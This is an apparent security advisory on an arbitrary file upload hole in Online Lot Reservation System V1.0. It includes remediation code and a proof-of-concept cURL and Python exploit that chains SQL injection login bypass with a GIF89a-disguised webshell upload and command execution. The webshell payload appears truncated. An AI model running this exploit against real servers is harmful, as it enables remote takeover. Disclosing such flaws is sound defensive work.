# Vulnerability Summary: Arbitrary File Upload Vulnerability in Online Lot Reservation System V1.0 ## Vulnerability Overview * **Project Name**: Online Lot Reservation System V1.0 * **Vulnerable File**: `edithousepic.php` * **Vulnerability Type**: Arbitrary File Upload * **Vulnerability Cause**: 1. **File type detection is bypassable**: Uses `getimagesize()` for detection, but can be bypassed by adding `GIF89a` magic bytes to the file header. 2. **Filename is not renamed**: The original name of the uploaded file is used directly. 3. **Fixed but executable directory**: Files are uploaded to a fixed `housing/` directory, which allows PHP code execution. * **Exploitation Conditions**: No login or authorization required (administrator session can be obtained via SQL injection). ## Impact Scope * Attackers can upload malicious files (e.g., WebShells). * Arbitrary system commands can be executed remotely. * May lead to complete compromise of the server. * May facilitate further penetration into the internal network. ## Remediation Solutions 1. **Strict File Type Validation**: ```php $allowed_ext = ['jpg', 'jpeg', 'gif', 'png']; $ext = strtolower(pathinfo($filename, PATHINFO_EXTENSION)); if (!in_array($ext, $allowed_ext)) { die('Extension not allowed'); } ``` 2. **Check MIME Type**: ```php $finfo = finfo_open(FILEINFO_MIME_TYPE); $ext = finfo_file($finfo, $file['tmp_name']); if (!in_array($ext, ['image/jpeg', 'image/gif', 'image/png'])) { die('Invalid file type'); } ``` 3. **Rename Uploaded Files**: ```php $new_filename = uniqid() . '.' . $ext; ``` 4. **Disable PHP Execution in Upload Directory**: Add a `.htaccess` file to the upload directory or configure Nginx to prohibit PHP execution. ## Proof of Concept (PoC) ### Attack Steps (cURL) ```bash # 1. Obtain administrator session via SQL injection curl -X POST http://127.0.0.1:7777/onlineLot/loginuser.php \ -d "email=admin' OR '1'='1'-- -&password=test" -c cookies.txt # 2. Create WebShell (bypass detection using GIF89a header) echo "GIF89a" > shell.php # 3. Upload malicious file curl -X POST "http://127.0.0.1:7777/onlineLot/edithousepic.php?houseid=1" \ -F "image=@shell.php" -b cookies.txt # 4. Execute command curl "http://127.0.0.1:7777/onlineLot/housing/shell.php?cmd=whoami" ``` ### Python PoC ```python #!/usr/bin/env python3 import requests from urllib.parse import urljoin url = "http://127.0.0.1:7777" houseid = "1" cmd = "system('whoami');" s = requests.Session() # 1. SQL Injection to Obtain Cookies r = s.post(urljoin(url, "onlineLot/loginuser.php"), data={"email": "admin' OR '1'='1'-- -", "password": "a"}, allow_redirects=False) if r.status_code != 302: print("[-] Login failed") exit() print("[+] Login success") # 2. Upload WebShell (Path Traversal to the root directory) upload_url = urljoin(url, "/onlineLot/edithousepic.php?houseid=" + houseid) shell = b"GIF89a" r = s.post(upload_url, files={"image": ("shell.php", shell, "image/gif")}, allow_redirects=False) if r.status_code != 302: print("[-] Upload failed") exit() print("[+] Shell uploaded") # 3. Execute Commands shell_url = urljoin(url, "/onlineLot/housing/shell.php") r = s.get(shell_url, params={"cmd": cmd}) print("[+] Output:") print(r.text.replace("GIF89a", "").strip()) ```